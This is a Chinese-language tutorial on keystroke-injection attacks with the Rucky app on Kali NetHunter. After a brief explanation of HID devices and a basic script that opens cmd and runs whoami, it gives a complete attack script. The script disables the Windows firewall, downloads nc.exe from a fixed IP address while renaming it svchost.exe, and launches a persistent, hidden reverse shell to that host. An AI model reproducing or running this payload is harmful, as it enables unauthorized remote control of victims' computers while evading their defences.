NetHunter使用Rucky实现HID键盘数据模拟攻击
知识概要:
- NetHunter:是
Kali Linux推出的移动Android端的系统 - Rucky:是一种基于
HID设备的攻击工具,其本质是一个可编程的键盘模拟器,可以用于快速执行各种攻击,例如在目标计算机上执行特定的命令、窃取密码等。 - HID:是指人体接口设备,常见的
HID包括键盘、鼠标、摄像头等USB设备。攻击者可以在HID设备上植入恶意代码,然后通过连接该设备到计算机,让计算机误认为该HID设备是一个普通的键盘或鼠标,并执行隐藏的恶意操作
首先你的Android设备需要拥有ROOT权限访问你的硬件借口,第二是你的USB数据口需要你的内核开放HID攻击的功能,刷入Nethunter的内核是支持的,如果需要刷入NetHunter可以查看我之前刷入NetHunter的文档
好的这里我们开始实验,可以在NetHunter商店中下载Rucky,可以在Github中下载比较新的版本: https://github.com/mayankmetha/Rucky
如果想要深入的了解可以如查阅Rucky语法的相关资料,基本的语法就是
DELAY 2000
GUI r
SIRING cmd
ENTER
DELAY 2000
SIRING whoami
例如上述:
- DELAY 2000: 2000表示需要等待2秒
- GUI r: GUI键盘上的
Win键,r表示输入r键 - SIRING : 往窗口输入字符
cmd - cmd: 模拟键盘摁下
ENTER回车键
所以上述脚本就是会打开cmd窗口,然后执行whoami命令
例如下方下载nc.exe,然后使用`nc.exe`反弹shell的脚本
DELAY 2000
GUI r
DELAY 300
STRING powershell
CTRL SHIFT ENTER
DELAY 2000
STRING netsh advfirewall set allprofiles state off
ENTER
DELAY 800
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING echo (wget 'http://192.168.122.222:8080/nc.exe' -OutFile svchost.exe) > b.ps1
ENTER
DELAY 1000
STRING powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000
STRING echo while($true){./svchost.exe 192.168.122.222 443 -e cmd.exe -d} > c.ps1
ENTER
DELAY 1000
STRING start /min powershell -ExecutionPolicy ByPass -File c.ps1 & exit
DELAY 1000
ENTER